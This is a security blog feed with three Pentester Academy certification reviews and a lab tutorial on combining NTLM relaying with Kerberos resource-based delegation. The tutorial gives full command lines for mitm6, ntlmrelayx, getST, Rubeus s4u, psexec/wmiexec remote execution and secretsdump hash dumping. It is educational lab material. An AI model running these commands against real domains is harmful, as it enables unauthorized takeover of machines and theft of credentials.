Jekyll2020-02-05T08:15:34+00:00https://chryzsh.github.io/feed.xmlc:\rusher blogAn amazing website.c:\rusherReview of Pentester Academy - Global Central Bank (GCB)2019-12-16T13:00:00+00:002019-12-16T13:00:00+00:00https://chryzsh.github.io/pta-gcb<p>You may have seen my previous reviews of the certifications <a href="https://chryzsh.github.io/pta-adlab/">Pentester Academy - Active Directory Lab</a> and <a href="https://chryzsh.github.io/pta-rtlab/">Pentester Academy - Windows Red Team Lab</a>, which I did earlier this year. The first course is intended for Active Directory security beginners, while the second is more geared towards those wanting to learn more advanced Windows infrastructure concepts.</p>
<p>This is my review of <a href="https://www.pentesteracademy.com/gcb">Pentester Academy - Global Central Bank: An Enterprise Cyber Range</a> which is the third in their progression of Active Directory oriented certifications, after the two I mentioned above. This course provides yet another an Active Directory lab that allows you to practice not only complicated attacks on enterprise infrastructure, but allows you to watch it with defensive eyes using a third party monitoring tool. This really shows you how loud you are, and you’re going to feel like you are staring at yourself in the mirror asking “am I always this ugly?”.</p>
<p><img src="https://www.pentesteracademy.com/img/gcb.png" alt="" />
<em>High level overview of the lab network</em></p>
<h2 id="the-lab-and-course">The lab and course</h2>
<p>I’ve already written a lot about the previous courses so I will keep this short. The lab is very challenging. Even with a certain degree of experience this lab forces you into some very awkward edge-case style scenarios you most likely have never encountered. Without giving away too much, there were scenarios such as finding a single service running on hosts in a /16 behind a firewall, getting remote command execution on machines with application whitelisting and abusing ACLs across forests. I bought 60 days of lab time, and I just got through it, even when I pulled some full day 16 hour hacking sessions. So if you ask me, 60 days is the minimum should get, because it’s hard and you’re going to suffer a lot, just like I did.</p>
<p>Like the other courses, there was a course consisting of PDFs and videos covering the subjects. A lot of the concepts were new to me, and it was very cool to try some of the attacks and Active Directory features first hand. Here are some of the concepts covered:</p>
<ul>
<li>PAM trusts</li>
<li>LAPS</li>
<li>“The printer bug”</li>
<li>Resource based constrained delegation (which I did <a href="https://chryzsh.github.io/relaying-delegation/">a blog post</a> on earlier)</li>
<li>Exchange permissions</li>
<li>Just Enough Administration</li>
</ul>
<h2 id="the-exam">The exam</h2>
<p>Like the previous red team lab, this certifications sports a 48 hour exam. The main difference from the two previous exams was a bit of a different structure. This exam has an attack and a defense part, where the two parts are weighted 50/50. This means that after you hack your way through to Enterprise Admin you have to mitigate as many vulnerabilities as you can. I thought this gave the exam a very cool edge that I haven’t seen anywhere else. I did however feel like the course and lab did not prepare me as well for the defense part as it did for the attack part. But who said the exam was going to be easy?</p>
<p>Like the other two certifications, a proper pentest report is required to pass. It must include detailed writeups of the attack and mitigation of vulnerabilities in the lab environment. I did so to the best of my abilities, and even though I realized I had missed a few things the same night I had sent my report, I was fairly confident I would pass.</p>
<p>I woke up two days later to one of the most relieving emails of my career:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Congratulations! You have cleared the examination! You are now a PentesterAcademy Certified Enterprise Security Specialist.
</code></pre></div></div>
<p>Once again, <a href="https://twitter.com/nikhil_mitt">Nikhil Mittal</a> reached out and we once again discussed some potential improvements for the lab and exam. I think this is a very nice touch to the whole certification experience, especially for platforms like this, which aren’t always as polished as you might expect.</p>
<h2 id="conclusion">Conclusion</h2>
<p>Again, this is probably the hardest certification I have done so far in my career. But it was like the two previous ones, intensely rewarding to get it. I’m also proud to share that I am the first individual to acquire the PACES certification.</p>
<p>I think this is probably the most up-to-date Active Directory security certification you can get, and I can absolutely recommend it to anyone who is up for a grueling, but rewarding challenge. If you have any questions, please <a href="https://twitter.com/chryzsh">message me on Twitter</a> or hit me up @crusher in the <a href="https://bloodhoundgang.herokuapp.com/">Bloodhound slack</a>.</p>
<p><img src="https://www.themarysue.com/wp-content/uploads/2018/08/hackers-hack-the-planet.jpg" alt="Hack the planet!" /></p>c:\rusherYou may have seen my previous reviews of the certifications Pentester Academy - Active Directory Lab and Pentester Academy - Windows Red Team Lab, which I did earlier this year. The first course is intended for Active Directory security beginners, while the second is more geared towards those wanting to learn more advanced Windows infrastructure concepts.Review of Pentester Academy - Windows Red Team Lab2019-12-16T08:00:00+00:002019-12-16T08:00:00+00:00https://chryzsh.github.io/pta-rtlab<p>You may have seen my previous reviews of <a href="https://chryzsh.github.io/pta-adlab/">Pentester Academy - Active Directory Lab</a> which I wrote back in April after I got the certification. It is a great course intended for beginners in AD security, so if you feel like that is you, I guess you read that review first.</p>
<p>This is my review of <a href="https://www.pentesteracademy.com/redlabsb">Pentester Academy - Windows Red Team Lab</a> which is the next step in their progression of Active Directory oriented certifications. This course provides an Active Directory lab that allows you to practice sophisticated attacks on Microsoft infrastructure and enterprise applications. It is harder and more complicated than the previous certification.</p>
<p>I actually did this certification back in May this year, but writing this review kind of drowned in other things. However, here it is!</p>
<p><img src="https://www.pentesteracademy.com/img/redteamlab.png" alt="" />
<em>High level overview of the lab network</em></p>
<h2 id="the-lab-and-course">The lab and course</h2>
<p>I bought access to 30 days of lab time. In addition to lab access, there PDFs and a few hours of videos taking you through some of the subjects you encounter in the lab. There are tons of learning objectives that follows a flag system to not only teach you enumeration, foothold and, but also a lot about the Windows file system, how credentials are stored, and occasionally how enterprise applications work in a Windows environment. Some of the subjects include the usual things like domain enumeration, escalation of privilege, but more specific and interesting subjects you might have not encountered before, like:</p>
<ul>
<li>MSSQL server and server links</li>
<li>Attacks on and across domain and forest trusts</li>
<li>Kerberos concepts</li>
<li>Battling network segregation</li>
<li>Phishing and payload generation</li>
</ul>
<p>The lab is intended as a challenge, and the course does not cover everything you need to know. Having done the previous AD lab, I can tell you this is more challenging and requires you to do a lot of your own research. However, the lab team is very lenient with hints and provides good assistance if you ask nicely. Just a peek of some of the tools and frameworks I used in the labs:</p>
<ul>
<li><a href="https://github.com/NetSPI/PowerUpSQL">PowerUpSQL</a></li>
<li><a href="https://github.com/GhostPack/Rubeus">Rubeus</a></li>
<li><a href="https://github.com/samratashok/nishang">Nishang</a></li>
<li><a href="https://github.com/PowerShellMafia/PowerSploit">Powersploit</a></li>
<li><a href="https://github.com/gentilkiwi/mimikatz">Mimikatz</a></li>
<li><a href="https://github.com/besimorhino/powercat">Powercat</a></li>
<li><a href="https://www.heidisql.com/">HeidiSQL</a></li>
</ul>
<p>Also, without spoiling the lab too much, I challenged myself to learn some more Powershell by writing a custom tool for a specific operation. It was a tool to password spray Jenkins instances. It can be found on my Github at <a href="https://github.com/chryzsh/Invoke-JenkinsPasswordSpray">chryzsh/Invoke-JenkinsPasswordSpray</a>.</p>
<h2 id="the-exam">The exam</h2>
<p>Since this is a certification, and not only a lab there is a 48 hour exam you have to pass to get the certification called <code class="language-plaintext highlighter-rouge">Pentester Acadmey Red Team Expert</code>. The pass criteria is not a strict x of out y amount of boxes, but is determined by Pentester Academy based on the quality of your report.</p>
<p>I will say that I did not find the exam as hard as the lab, but still had a good bunch of rabbit holes that forced me to think quite hard about what I was doing. I cleared the exam in good time, but it wasn’t without effort as I did spend nearly every waking hour of the 30 days I had in the lab hacking away, learning and retrying things.</p>
<p>It was very rewarding to completely compromise both the course and exam lab. I submitted a detailed report containing detailed description of identified vulnerabilities and recommendations for mitigating them. I also included a detailed writeup with screenshots of how I compromised the lab. Writing a professional pentest report is key to passing this exam.</p>
<p>Shortly after, I got a personal email from the big brain of it all, <a href="https://twitter.com/nikhil_mitt">Nikhil Mittal</a> thanking me once again for a good report and asking me for feedback. We traded some ideas about possible improvements, and I had the impression we agreed on most points. I hope other students can benefit from this.</p>
<h2 id="conclusion">Conclusion</h2>
<p>Again, this was a very rewarding certification. The lab is challenging, thorough, and you won’t find anything that lets you learn Active Directory security as dynamically as this. Trust me when I say that Pentester Academy provides some of the best lab support that not only helps you with technical issues, but always pushes you in the right direction when you are struggling.</p>
<p>Once again, I can highly recommend this course for anyone looking to improve their skills in Active Directory security and penetration testing. And if you have any questions, please <a href="https://twitter.com/chryzsh">message me on Twitter</a> or hit me up @crusher in the <a href="https://bloodhoundgang.herokuapp.com/">Bloodhound slack</a>.</p>
<h3 id="other-active-directory-labs">Other Active Directory labs</h3>
<p>Many have asked me whether I can compare these AD labs to any of the other Active Directory labs available like those on Hackthebox. I still haven’t done all of those, but check the bottom section of <a href="https://chryzsh.github.io/pta-adlab/">my previous review</a> for a list of labs I know of.</p>
<p><img src="https://i.imgflip.com/2i9u4y.jpg" alt="" /></p>c:\rusherYou may have seen my previous reviews of Pentester Academy - Active Directory Lab which I wrote back in April after I got the certification. It is a great course intended for beginners in AD security, so if you feel like that is you, I guess you read that review first.Review of Pentester Academy - Attacking and Defending Active Directory2019-04-17T11:50:00+00:002019-04-17T11:50:00+00:00https://chryzsh.github.io/pta-adlab<p>This is my review of <a href="https://www.pentesteracademy.com/activedirectorylab">Pentester Academy Attacking and Defending Active Directory</a>. This course provides an Active Directory lab that allows you to practice all kinds of attack on Microsoft infrastructure.</p>
<p><img src="https://www.pentesteracademy.com/img/activedirectorylab.png" alt="" />
<em>High level overview of the lab network</em></p>
<h2 id="the-course">The course</h2>
<p>I bought access to 30 days of lab time. That includes PDFs and several hours of videos, which goes through the subjects very thoroughly in the lab. That allowed me to follow and understand every step in every attack. There are 23 learning objectives that follow the subjects, which is great because it enforces learning and understanding. The course is very clearly lined out, and every single lab objective is thoroughly explained in the videos and the PDFs. Some of the subjects include:</p>
<ul>
<li>Domain enumeration</li>
<li>Local privilege escalation</li>
<li>Domain privilege escalation</li>
<li>Domain and forest persistence</li>
<li>Cross trust attacks</li>
<li>Defenses and bypasses</li>
</ul>
<p>While I do have some experience with pentesting Active Directory environments, I actually learnt quite a lot, especially the parts about persistence and attacking trusts, which I had never had the chance to practice before. For someone new or semi-experienced to pentesting Active Directory, this course is perfect.</p>
<p>I would also like to emphasize that the course appears very modern. There are attack techniques on Kerberos only developed the last few years that are covered, and lateral movement techniques using native tools such as WinRM, in addition to other Powershell oriented attacks. These are some of the tools and frameworks used in the course</p>
<ul>
<li><a href="https://github.com/samratashok/nishang">Nishang</a></li>
<li><a href="https://github.com/PowerShellMafia/PowerSploit">Powersploit</a></li>
<li><a href="https://github.com/gentilkiwi/mimikatz">Mimikatz</a></li>
<li><a href="https://github.com/gentilkiwi/kekeo">Kekeo</a></li>
<li><a href="https://github.com/NetSPI/PowerUpSQL">PowerUpSQL</a></li>
<li><a href="https://github.com/besimorhino/powercat">Powercat</a></li>
<li><a href="https://hashcat.net/">Hashcat</a></li>
<li><a href="https://www.heidisql.com/">HeidiSQL</a></li>
</ul>
<h2 id="the-exam">The exam</h2>
<p>The exam is 24 hours in a completely dedicated exam lab with a group of hosts and accounts. I was required to apply a good range of what was taught in the course, including enumeration, exploitation, lateral movement and credential abuse. After the exam, there is a period of 48 hours dedicated to writing and submitting the report. It was a very rewarding experience to get domain admin in this lab. I will not reveal anything more about the exam than that.</p>
<h2 id="certification">Certification</h2>
<p>After about 24 hours I got an email saying I had passed the certification.</p>
<p><img src="../assets/img/pta-adlab/2019-04-17-17-55-14.png" alt="" /></p>
<p>Shortly after, I got a personal email from the course creator <a href="https://twitter.com/nikhil_mitt">Nikhil Mittal</a> thanking me for a well accomplished exam and a good report. I was allowed to provide detailed feedback on what was good and what could be improved in the course and exam. I genuinly feel that my feedback was heard and I hope future students will benefit from that.</p>
<h2 id="conclusion">Conclusion</h2>
<p>I’m very satisfied with the course, the labs and the exam experience. Also, Pentester Academy provided great support during the lab and the exam. Any minor issue was followed up on almost instantly. I will definitely be signing up for the more challenging Red Team Lab soon!</p>
<p>Once again, I can highly recommend this course for anyone looking to improve their skills in Active Directory security. And if you have any questions, please <a href="https://twitter.com/chryzsh">message me on Twitter</a>.</p>
<h3 id="other-active-directory-labs">Other Active Directory labs</h3>
<p>Many have asked me whether I can compare this lab to any of the other Active Directory labs available. I can’t make any direct comparisons as I haven’t done them all, but here are some I know of</p>
<ul>
<li><strong>Pentester Academy Red Team Lab</strong>
<ul>
<li>Available at Pentester Academy - <a href="https://www.pentesteracademy.com/redteamlab">Red Team Lab</a></li>
<li>More challenging than the AD lab course</li>
</ul>
</li>
<li><strong>Hackthebox - Offshore</strong>
<ul>
<li>Forests and trust abuse + a lot more</li>
<li>Available as a purchased lab on <a href="https://www.hackthebox.eu/">Hackthebox</a></li>
</ul>
</li>
<li><strong>Hackthebox - Rastalabs</strong>
<ul>
<li>External to internal compromise</li>
<li>Available as a purchased lab on <a href="https://www.hackthebox.eu/">Hackthebox</a></li>
</ul>
</li>
<li><strong>Hackthebox - Endgame P.O.O.</strong>
<ul>
<li>MSSQL, WinRM</li>
<li>Free with Guru ranking on Hackthebox</li>
</ul>
</li>
<li><strong>SparcFLOW labs</strong>
<ul>
<li><a href="https://www.hacklikeapornstar.com/learn-hacking-one-day/">Alpha + Zeta</a></li>
<li>Similar concepts as those taught in his books</li>
</ul>
</li>
<li><strong>SpecterOps Red Team Operations</strong>
<ul>
<li><a href="https://specterops.io/how-we-help/training-offerings/adversary-tactics-red-team-operations">https://specterops.io/how-we-help/training-offerings/adversary-tactics-red-team-operations</a></li>
<li>Access only provided as part of on-site training</li>
</ul>
</li>
</ul>c:\rusherThis is my review of Pentester Academy Attacking and Defending Active Directory. This course provides an Active Directory lab that allows you to practice all kinds of attack on Microsoft infrastructure.Combining NTLM Relaying and Kerberos delegation2019-04-14T16:08:00+00:002019-04-14T16:08:00+00:00https://chryzsh.github.io/relaying-delegation<p>A computer takeover attack through some funky relaying and abuse of Kerberos.</p>
<p><img src="https://danlebrero.com/images/cerberus.jpg" alt="" /></p>
<h1 id="overview">Overview</h1>
<p>I’m a huge fan of <a href="https://dirkjanm.io/">dirkjan</a>’s recent discoveries with Kerberos, and his articles are awesome. It did however take me a while to understand what actually goes on in the Kerberos delegation attack, so I’ve made an attempt to explain the details of it and how to execute the attack. I also have done a few experiments on what to do with it once it has been successfully executed. As this is all based on his article <a href="https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/">The worst of both worlds: Combining NTLM Relaying and Kerberos delegation</a>, I recommend reading that first.</p>
<h2 id="what-do-we-achieve-from-this-attack">What do we achieve from this attack?</h2>
<ul>
<li>Remote code execution on a domain joined computer</li>
<li>Local privilege escalation on said host, with access as SYSTEM</li>
<li>Access to a domain machine account
<ul>
<li>Can be used for domain enumeration (Bloodhound, PingCastle, Powerview, etc.)</li>
</ul>
</li>
</ul>
<h1 id="how-does-it-work">How does it work?</h1>
<p>When Windows configured for DHCP boots, it looks for DHCP configuration, and then proxy configuration using WPAD. That way, when the victim computer boots and starts looking for proxy config, the machine account tries to authenticate to us.</p>
<ol>
<li>
<p>We set up a man-in-the-middle DHCP server on IPv6 and serve a DNS IPv6 configuration that points to our rogue DNS IPv6 server.</p>
</li>
<li>
<p>When the victim uses WPAD to look for a proxy configuration file over DNS, we let it connect to our fake proxy server and then prompt for authentication using a <code class="language-plaintext highlighter-rouge">407 Authentication Required</code> request.</p>
</li>
<li>
<p>We capture and relay the (encrypted) credentials of the machine account to LDAPS on the domain controller (DC).</p>
</li>
<li>
<p>We ask the DC over LDAPS to create a new machine account. Active Directory allows any user account, including machine accounts to add 10 machine accounts by default.</p>
</li>
<li>
<p>We now have credentials for a machine account. The reason we create a machine account is that we need access to an account with a Service Principal Name (SPN).</p>
</li>
<li>
<p>We now ask the DC to configure resource-based constrained delegation for this new machine account on the victim computer object. For example: the machine account <code class="language-plaintext highlighter-rouge">WS02$</code> sets the <code class="language-plaintext highlighter-rouge">msDS-AllowedToActOnBehalfOfOtherIdentity</code> attribute on the computer object <code class="language-plaintext highlighter-rouge">WS02</code> to allow the newly created machine account to impersonate users on it.</p>
</li>
<li>
<p>We request a service ticket using the machine account that was created, where we impersonate a user that has local admin access to our target computer.</p>
</li>
<li>
<p>We use the service ticket to access the computer with local admin privileges. The ticket with these privileges is only valid on the target box.</p>
</li>
</ol>
<h1 id="prerequisites">Prerequisites</h1>
<ul>
<li>Install <a href="https://github.com/SecureAuthCorp/impacket">impacket</a> and <a href="https://github.com/fox-it/mitm6">mitm6</a></li>
<li>Install the required kerberos packages
<ul>
<li><code class="language-plaintext highlighter-rouge">apt install krb5-user cifs-utils</code></li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">pip install service-identity</code></li>
</ul>
<h1 id="requirements">Requirements</h1>
<ul>
<li>A Linux host on the network. The attack is hard to execute without a host we have full control over.</li>
<li>Domain users must be allowed to create machine accounts in the domain.</li>
<li>Target computer(s) must have proxy configured, with internal IPs set up as exceptions</li>
<li>To replicate it in our lab we will need LDAP over TLS (LDAPS). See <a href="https://gist.github.com/magnetikonline/0ccdabfec58eb1929c997d22e7341e45">installation guide</a> for setting up certificates on domain controller.
<ul>
<li>Active Directory Certificate Services (ADCS) must be running on the DC with a valid certificate installed. This enables LDAP over TLS.</li>
</ul>
</li>
<li>IPv6 must be enabled in the network</li>
</ul>
<p>We can replicate the attack by rebooting Windows for every try, assuming a lab scenario where we control the target. In a real scenario we would have to force a reboot somehow, or show up early and wait for people to turn on their computers. A disconnect of the network card should supposedly work as well, but this is not entirely consistent in my experience.</p>
<h1 id="setup">Setup</h1>
<h2 id="components-of-the-attack">Components of the attack</h2>
<ul>
<li><code class="language-plaintext highlighter-rouge">lab.local</code> - AD Domain Name</li>
<li><code class="language-plaintext highlighter-rouge">dc01.lab.local</code> - AD Domain Controller</li>
<li><code class="language-plaintext highlighter-rouge">ws02.lab.local</code> - Target machine</li>
<li><code class="language-plaintext highlighter-rouge">192.168.0.142</code> - Attacker host IP</li>
<li><code class="language-plaintext highlighter-rouge">WS02$</code> - Target machine’s machine account
<ul>
<li>Dollar sign after the name signifies that it’s a machine account</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">lkys</code> - Domain Administrator</li>
</ul>
<h2 id="mitm6">mitm6</h2>
<p>Start up the server, specify hostname we want to target and domain.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mitm6 -hw ws02 -d lab.local --ignore-nofqnd
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-12-43-22.png" alt="" /></p>
<h2 id="ntlmrelayx">ntlmrelayx</h2>
<p>Start ntlmrelayx, specify domain controller, delegation attack, disable the SMB server and set the name for a malicious WPAD file that will be generated and served to the target.</p>
<p>Create a machine account is supposedly not allowed over LDAP, it needs LDAP over TLS (LDAPS). More on this later.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ntlmrelayx.py -t ldaps://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-12-44-15.png" alt="" /></p>
<h1 id="attack">Attack</h1>
<p>The only real way to trigger an IPv6 WPAD request is through a user login after a reboot, or reconnects to the network. Once a user is logged in, things should start happening in mitm6 and ntlmrelayx.</p>
<p>What happens first is that the target computer starts performing name resolution to find a proxy server over IPv6. What we then to is a man in the middle attack for DNS on IPv6, where we say “we have the proxy we are looking for!”.</p>
<p><img src="../assets/img/relaydelegation/2019-04-14-12-58-20.png" alt="" /></p>
<p>ntlmrelayx captures the incoming request and serves a proxy configuration which ask the target for authentication. The target promptly answers with the machine account’s NTLMv2 hash (NetNTLMv2). ntlmrelayx then relays the captured credentials to LDAP on the domain controller, uses that to create a new machine account, print the account’s name and password and modifies the delegation rights of it.</p>
<p><em>We make a note of the username and password for later so it doesn’t disappear</em></p>
<p><img src="../assets/img/relaydelegation/2019-04-14-13-31-11.png" alt="" /></p>
<p>Once the attack has been performed, the machine account should show up as a computer in the domain</p>
<p><img src="../assets/img/relaydelegation/2019-04-14-13-33-09.png" alt="" /></p>
<p>We can see with RSAT that the <code class="language-plaintext highlighter-rouge">LUJCDPUQ$</code> machine account is allowed to delegate on the computer object <code class="language-plaintext highlighter-rouge">WS02</code>. This can be seen in the <code class="language-plaintext highlighter-rouge">PrincipalsAllowedToDelegateToAccount</code> attribute on the computer object. We can use RSAT to query this</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ADComputer WS02 -Properties PrincipalsAllowedToDelegateToAccount
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-14-17-51.png" alt="" /></p>
<p>We can check with <a href="https://github.com/Kevin-Robertson/Powermad">Powermad</a> who added the machine account. As we can see, the machine account <code class="language-plaintext highlighter-rouge">WS02$</code> added it. It is also the machine account <code class="language-plaintext highlighter-rouge">WS02$</code> that adds the delegation privilege to the computer object <code class="language-plaintext highlighter-rouge">WS02</code>. I execute the below command from a non-domain joined host so I had to specify domain and a credential.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-MachineAccountCreator -Domain lab.local -DomainController dc01.lab.local -Credential lkys
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-14-16-31.png" alt="" /></p>
<h2 id="request-kerberos-ticket">Request Kerberos ticket</h2>
<p>We now request a Kerberos service ticket (TGS) for the <code class="language-plaintext highlighter-rouge">cifs</code> SPN for the machine account we created, using impersonation as a user <code class="language-plaintext highlighter-rouge">lkys</code> that is member of the<code class="language-plaintext highlighter-rouge">Domain Admins</code> group. That user naturally has local administrator access to all computers in the domain. When prompted for password,we input the password that was set for the machine account <code class="language-plaintext highlighter-rouge">LUJCDPUQ$</code> when we performed the relaying attack.</p>
<p><em>Common Internet File System (CIFS) is a network filesystem protocol used for providing shared access to files and printers between machines on the network.</em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>getST.py -spn cifs/ws02.lab.local lab.local/ULRRDUA\$ -impersonate lkys
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-15-09-39.png" alt="" /></p>
<p>Now we should be able to use the <code class="language-plaintext highlighter-rouge">lkys.ccache</code> cached ticket to authenticate to the target machine.</p>
<p>We import the ticket from file into the Kerberos cache on our attacker box.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>export KRB5CCNAME=lkys.ccache
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-15-10-52.png" alt="" /></p>
<h2 id="verifying-access">Verifying access</h2>
<p>Before we get into command execution, we verify that we have read access to the c$ share. This is a common way to check if we have administrator privileges on a remote host.</p>
<p>We authenticate to SMB on <code class="language-plaintext highlighter-rouge">WS02</code> with the ticket using <code class="language-plaintext highlighter-rouge">smbclient</code> with the <code class="language-plaintext highlighter-rouge">-k</code> parameter that indicates we want to use a Kerberos ticket and <strong>not</strong> NTLM authentication with username and password.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>smbclient -k //ws02.lab.local/c$
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-15-12-20.png" alt="" /></p>
<p>Or with <code class="language-plaintext highlighter-rouge">smbclient.py</code> We don’t need to specify the full SPN, but I do it here to show you how the full SPN looks. You will also see here that it uses the TGS from the cache.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>smbclient.py -k lab.local/lkys@ws02.lab.local -debug -no-pass
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-15-16-28.png" alt="" /></p>
<h2 id="command-execution">Command execution</h2>
<p>We can get interactive remote command execution using <code class="language-plaintext highlighter-rouge">psexec.py</code>. Note that we can only get command execution as the SYSTEM user with PSexec and is it starts a service remotely as that user.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>psexec.py -k ws02.lab.local -debug -no-pass
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-15-18-32.png" alt="" /></p>
<p>We can also get it with <code class="language-plaintext highlighter-rouge">wmiexec.py</code>. With this, we actually get command execution as the domain admin user <code class="language-plaintext highlighter-rouge">lkys</code>. Note that it has to change the SPN. More about this in the sections below.</p>
<p><img src="../assets/img/relaydelegation/2019-04-14-15-45-33.png" alt="" /></p>
<p>If we want to dump the hashes of the target, we can use <code class="language-plaintext highlighter-rouge">secretsdump.py</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>secretsdump.py -k ws02.lab.local -no-pass
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-15-45-07.png" alt="" /></p>
<h1 id="further-exploration-of-the-attack">Further exploration of the attack</h1>
<p>Now we have performed the attack and have gained what we want to achieve; full administrator level privileges on a remote host, acquired from nothing but network access. This is where I go past what @dirkjanm detailed in his article and into research of my own. If you want to have a deeper understanding of the attack and what’s possible to do with it, keep reading.</p>
<h2 id="a-quick-look-at-wmi-execution">A quick look at WMI execution</h2>
<p>Let’s take a closer look at what goes on during command execution with <code class="language-plaintext highlighter-rouge">wmiexec.py</code> by turning on the <code class="language-plaintext highlighter-rouge">-debug</code> parameter.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wmiexec.py -k -no-pass -debug ws02.lab.local
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-15-25-28.png" alt="" /></p>
<p>Hold on a sec! The <code class="language-plaintext highlighter-rouge">cifs</code> SPN is only valid for access to file shares isn’t it? So how come we can execute WMI queries all of a sudden? Apparently, the <code class="language-plaintext highlighter-rouge">sname</code> field is not signed or protected by any means, so we can basically change it to the SPN we want. You could look at this as a feature or a bug. Either way, this automatic switch has been implemented in Impacket and we can see this behavior clearly in <code class="language-plaintext highlighter-rouge">wmiexec.py</code>.</p>
<p>Notice how it changes the SPN from CIFs to HOST in an attempt to get a valid SPN for WMI. It doesn’t even have to request a new ticket, it just changes the name and gets a valid ticket.</p>
<p>Check Secureauth’s article <a href="https://www.secureauth.com/blog/kerberos-delegation-spns-and-more">Kerberos Delegation, SPNs and More</a> for more information about this.</p>
<h2 id="executing-the-attack-from-windows">Executing the attack from Windows</h2>
<p>Now, so far we’ve only used Linux to perform the post attack operations, but there is a lot to learn from doing this from Windows. I’m doing this from a non-domain joined Windows machine on the network.</p>
<h3 id="requesting-ticket">Requesting ticket</h3>
<p>You can request the service ticket from Windows with <a href="https://github.com/GhostPack/Rubeus">Rubeus</a>. Now earlier when we executed the attack we got a username and a password for a new machine account in the domain. We have to hash the machine account password to RC4 first. Note that we have to escape the <code class="language-plaintext highlighter-rouge">'</code> characters from the password as well.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.\Rubeus.exe hash /password:ol@19`7+jq''''5)&
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-16-05-19.png" alt="" /></p>
<p>We then use the machine account to execute the two Kerberos concepts <code class="language-plaintext highlighter-rouge">S4U2SELF</code> + <code class="language-plaintext highlighter-rouge">S4U2Proxy</code> in addition to injecting the ticket into the cache on our attacker Windows box. It is all done in one operation using the <code class="language-plaintext highlighter-rouge">/ptt</code> parameter. Thanks <a href="https://blog.harmj0y.net/">harmj0y</a>! We specify <code class="language-plaintext highlighter-rouge">s4u</code>, as the operations we want to perform, with the impersonating user <code class="language-plaintext highlighter-rouge">lkys</code> and the <code class="language-plaintext highlighter-rouge">cifs</code> ticket we want for <code class="language-plaintext highlighter-rouge">ws02.lab.local</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.\Rubeus.exe s4u /user:LUJCDPUQ$ /impersonateuser:lkys /msdsspn:"cifs/ws02.lab.local" /ptt /rc4:3116C16787230147050F6835AFBF5EDF
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-16-09-50.png" alt="" /></p>
<ol>
<li>The first part is building AS-REQ with pre-authentication for the machine account. We can do this since we have provided the hash of the account.</li>
<li>We then request a TGT for the machine account from the domain controller.</li>
<li>We then use that TGT to perform <code class="language-plaintext highlighter-rouge">S4U2Self</code>, and acquire an impersonated service ticket for the DA <code class="language-plaintext highlighter-rouge">lkys@lab.local</code> to our machine account. It can be quite confusing because here we specify the SPN for our machine account, where as in a regular domain scenario we would normally provide the SPN for a service.</li>
<li>We now have “proof” in the form of a service ticket that we are the machine account. We then execute <code class="language-plaintext highlighter-rouge">S4U2Proxy</code> to the remote service, which in this case is the victim machine. So we impersonate <code class="language-plaintext highlighter-rouge">lkys</code> to the target SPN <code class="language-plaintext highlighter-rouge">cifs/ws02.lab.local</code> with <code class="language-plaintext highlighter-rouge">s4u2proxy</code> and get a valid service ticket which allows us to impersonate the domain domain <code class="language-plaintext highlighter-rouge">lkys</code> on the target machine.</li>
</ol>
<h3 id="explanation-of-the-above">Explanation of the above</h3>
<p>What we are really doing here is abusing resource-based constrained delegation. You can read about this concept in the extensive article <a href="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html">Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory</a>.</p>
<p>Quickly explained though with the figure below as reference. In our example:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">Service A</code> = the machine account <code class="language-plaintext highlighter-rouge">LUJCDPUQ$</code> which we created</li>
<li>Service B = the computer object <code class="language-plaintext highlighter-rouge">WS02</code></li>
</ul>
<p>We are enabling resource-based constrained delegation on that computer object using the credentials of the machine accounts <code class="language-plaintext highlighter-rouge">WS02$</code>. Essentially we are giving the the privilege to impersonate the user <code class="language-plaintext highlighter-rouge">lkys</code> on the <code class="language-plaintext highlighter-rouge">WS02</code> computer object.</p>
<p><img src="https://shenaniganslabs.io/images/TrustedToAuthForDelegationWho/Diagrams/DelegationTypes.png" alt="" /></p>
<p>Then we have the <code class="language-plaintext highlighter-rouge">S4u2Proxy</code> request, as explained in step 4 above.</p>
<p><img src="https://shenaniganslabs.io/images/TrustedToAuthForDelegationWho/Diagrams/S4U2Proxy.png" alt="" /></p>
<h3 id="verifying-access-1">Verifying access</h3>
